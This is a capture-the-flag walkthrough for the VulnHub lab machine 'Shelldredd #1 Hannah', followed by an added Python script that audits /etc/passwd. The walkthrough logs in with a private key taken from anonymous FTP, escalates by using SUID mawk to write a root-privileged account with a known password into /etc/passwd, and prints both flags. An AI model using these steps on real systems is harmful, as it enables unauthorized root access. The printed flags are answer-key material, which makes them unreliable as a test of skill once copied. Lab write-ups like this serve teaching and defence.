[VULNHUB] Shelldreed #1 HANNAH

Today we are going to hack the Vulnhub machine called Shelldreed #1 HANNAH. You can download it from the following link: https://www.vulnhub.com/entry/onsystem-shelldredd-1-hannah,545/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.108
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST
    Nmap scan report for 192.168.1.108
    Host is up (0.00035s latency).
    Not shown: 65533 closed ports
    PORT      STATE SERVICE VERSION
    21/tcp    open  ftp     vsftpd 3.0.3
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.59
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 3
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
    |   256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
    |_  256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds
    After scanning the ports we see that only the FTP and SSH services are exposed. We connect to the FTP server with anonymous/anonymous to see what we can find...
    ~ > ftp 192.168.1.108
    Connected to 192.168.1.108.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.108:sml): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    226 Directory send OK.
    ftp> ls -la
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    3 0        115          4096 Aug 06 16:56 .
    drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
    drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .hannah
    226 Directory send OK.
    ftp>
    ftp> cd .hannah
    250 Directory successfully changed.
    ftp> ls -la
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .
    drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
    -rwxr-xr-x    1 0        0            1823 Aug 06 16:54 id_rsa
    226 Directory send OK.
    We see that inside .hannah there is an id_rsa file. We download it.
    ftp> get id_rsa
    local: id_rsa remote: id_rsa
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for id_rsa (1823 bytes).
    226 Transfer complete.
    1823 bytes received in 0.00 secs (1.6495 MB/s)
    It looks like an SSH private key, so we try to log in as hannah using that key.
    ~ > chmod 600 id_rsa
    ~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000
    The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't be established.
    ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known hosts.
    Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sat Sep  5 09:20:42 2020 from 192.168.1.140
    hannah@ShellDredd:~$
    We're in :)
  • user.txt
    hannah@ShellDredd:~$ ls
    user.txt
    hannah@ShellDredd:~$ cat user.txt
    Gr3mMhbCpuwxCZorqDL3ILPn
  • Privilege Escalation
  • We explore the system to see whether there is any SUID binary that could help us with privilege escalation.
    hannah@ShellDredd:~$ find / -perm -4000 2>/dev/null
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/umount
    /usr/bin/mawk
    /usr/bin/chfn
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/cpulimit
    /usr/bin/mount
    /usr/bin/passwd
    We see that "mawk" is SUID, which we can use. We are going to create a user with root privileges in /etc/passwd with the help of mawk. The password our user will use is "123", so we prepare its hash to put into the file.
    ~ > openssl passwd -1 -salt new 123
    $1$new$p7ptkEKU1HnaHpRtzNizS1
    Once we have the password we want to use, we use mawk to append to /etc/passwd a line with the root-privileged user that we will use!
    hannah@ShellDredd:~$ mawk -v LFILE=/etc/passwd 'BEGIN { print "ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> LFILE }'
    After running the command, we can now log in as "ruut".
    hannah@ShellDredd:~$ su ruut
    Password:123
    root@ShellDredd:/home/hannah#
    And now we are root!
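From the defender's side, the trace this technique leaves is a second UID 0 account in /etc/passwd carrying its password hash inline instead of an "x" pointing to /etc/shadow. The following script is an added example, not part of the original write-up: it parses passwd(5) lines and reports that pattern, plus empty password fields and duplicate usernames; SAMPLE_PASSWD is a constructed sample mirroring the result above, not copied from the VM.

```python
"""Audit /etc/passwd for the entry pattern used above: a second UID-0
account whose password hash sits inline instead of in /etc/shadow.
Added example, not from the original post; SAMPLE_PASSWD is constructed."""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")

def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into dicts; skip blank, comment and malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS) or not parts[2].isdigit():
            continue  # malformed line; a stricter audit could report it
        e = dict(zip(FIELDS, parts))
        e["uid"] = int(e["uid"])
        entries.append(e)
    return entries

def audit_passwd(text: str) -> list:
    """Return human-readable findings for suspicious entries."""
    findings = []
    seen = set()
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"extra UID 0 account: {e['name']}")
        if e["pw"] == "":
            findings.append(f"empty password field for {e['name']}")
        elif e["pw"] not in ("x", "*", "!", "!!"):
            # A real hash here is honoured by login/su and bypasses /etc/shadow.
            findings.append(f"inline password hash for {e['name']}")
        if e["name"] in seen:
            findings.append(f"duplicate username: {e['name']}")
        seen.add(e["name"])
    return findings

# Constructed sample mirroring the write-up's result (not copied from the VM).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
hannah:x:1000:1000:hannah,,,:/home/hannah:/bin/bash
ruut:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Against a live host, call audit_passwd(open("/etc/passwd").read()) from a cron job or a file-integrity check and alert on any non-empty result.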
  • root.txt
    root@ShellDredd:/home/hannah# cd /root
    root@ShellDredd:~# ls
    root.txt
    root@ShellDredd:~# cat root.txt
    yeZCB44MPH2KQwbssgTQ2Nof
  • End
  • And with that, we are root on the machine.